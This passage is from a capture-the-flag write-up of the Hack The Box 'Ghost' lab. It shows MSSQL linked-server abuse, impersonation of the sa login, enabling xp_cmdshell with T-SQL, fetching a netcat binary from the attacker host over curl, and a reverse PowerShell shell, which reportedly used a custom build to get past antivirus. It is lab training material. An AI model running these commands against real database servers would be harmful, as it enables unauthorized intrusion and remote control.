mssqlserver


Initially, the target MSSQL instance didn't appear to accept Kerberos authentication, so I fell back to NTLM authentication directly against the host. Upon gaining access to the MSSQL instance, I discovered that there was a linked server, namely PRIMARY. At first I assumed PRIMARY was just the name of another MSSQL instance on the same host, but it turned out to reside on a different host, PRIMARY

I was able to switch over to the PRIMARY host and was automatically authenticated as the bridge_corp account within the PRIMARY MSSQL instance. I then leveraged the impersonation privilege to become the sa account
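The hop described above, written out as explicit T-SQL rather than through mssqlclient.py's shortcuts. This is an added example, not a query from the original writeup: the linked server name PRIMARY, the bridge_corp login and the sa target are taken from the page; the permission-enumeration query and the assumption that RPC Out is enabled on the link are mine.

```sql
-- Added example (not from the original writeup): enumerate the link, check who
-- we are on the far side, confirm the IMPERSONATE grant, then impersonate sa
-- and enable xp_cmdshell on PRIMARY.

-- 1. Which linked servers does the initial instance know about?
--    is_rpc_out_enabled must be 1 for EXEC ... AT PRIMARY to work below (assumed).
SELECT name, is_linked, is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers
WHERE is_linked = 1;

-- 2. OPENQUERY runs its inner query on PRIMARY, so this shows the identity the
--    link authenticates as on the remote instance (bridge_corp on the page).
SELECT *
FROM OPENQUERY(PRIMARY, 'SELECT SYSTEM_USER AS remote_login,
                                IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. Which logins can that remote identity impersonate? IMPERSONATE on a server
--    principal is recorded in sys.server_permissions with class 101 and the
--    target login in major_id.
SELECT *
FROM OPENQUERY(PRIMARY, '
    SELECT grantee.name AS grantee, target.name AS can_impersonate, pe.state_desc
    FROM sys.server_permissions AS pe
    JOIN sys.server_principals AS grantee ON pe.grantee_principal_id = grantee.principal_id
    JOIN sys.server_principals AS target  ON pe.major_id = target.principal_id
    WHERE pe.class = 101 AND pe.permission_name = ''IMPERSONATE''
');

-- 4. Each EXEC ... AT is a separate batch on PRIMARY, so the EXECUTE AS must be
--    repeated in every batch. Enable xp_cmdshell as sa, then confirm execution.
EXEC ('EXECUTE AS LOGIN = ''sa'';
       EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
       EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT PRIMARY;

EXEC ('EXECUTE AS LOGIN = ''sa'';
       EXEC xp_cmdshell ''whoami'';') AT PRIMARY;
```

The quoting is the usual pain point: the inner batch is a string literal, so every single quote inside it is doubled, and inside OPENQUERY the same rule applies one level down. If step 1 shows is_rpc_out_enabled = 0, EXEC ... AT fails and only OPENQUERY (read-only SELECTs) is available over the link.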

Now that code execution via xp_cmdshell has been confirmed, I will attempt to establish a dedicated PowerShell session

SQL >[PRIMARY] (sa  dbo@master)> xp_cmdshell curl http://10.10.14.61/nc.exe -o %TEMP%\nc.exe
output
--------------------------------------------------------------------------------
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 28160  100 28160    0     0   278k      0 --:--:-- --:--:-- --:--:--  280k
NULL

Transferring a custom Netcat binary to the %TEMP% directory of the PRIMARY host. This is because the regular nc64.exe binary failed to execute due to the AV on the host

SQL >[PRIMARY] (sa  dbo@master)> xp_cmdshell %TEMP%\nc.exe 10.10.14.61 4444 -e powershell

Executing the custom Netcat binary for a reverse shell

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.10.14.61] from (UNKNOWN) [10.10.11.24] 56817
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
 
PS C:\Windows\system32> 
PS C:\Windows\system32> whoami
nt service\mssqlserver
PS C:\Windows\system32> hostname
PRIMARY
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.0.0.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.254

Initial foothold established on the PRIMARY host as the nt service\mssqlserver account via Netcat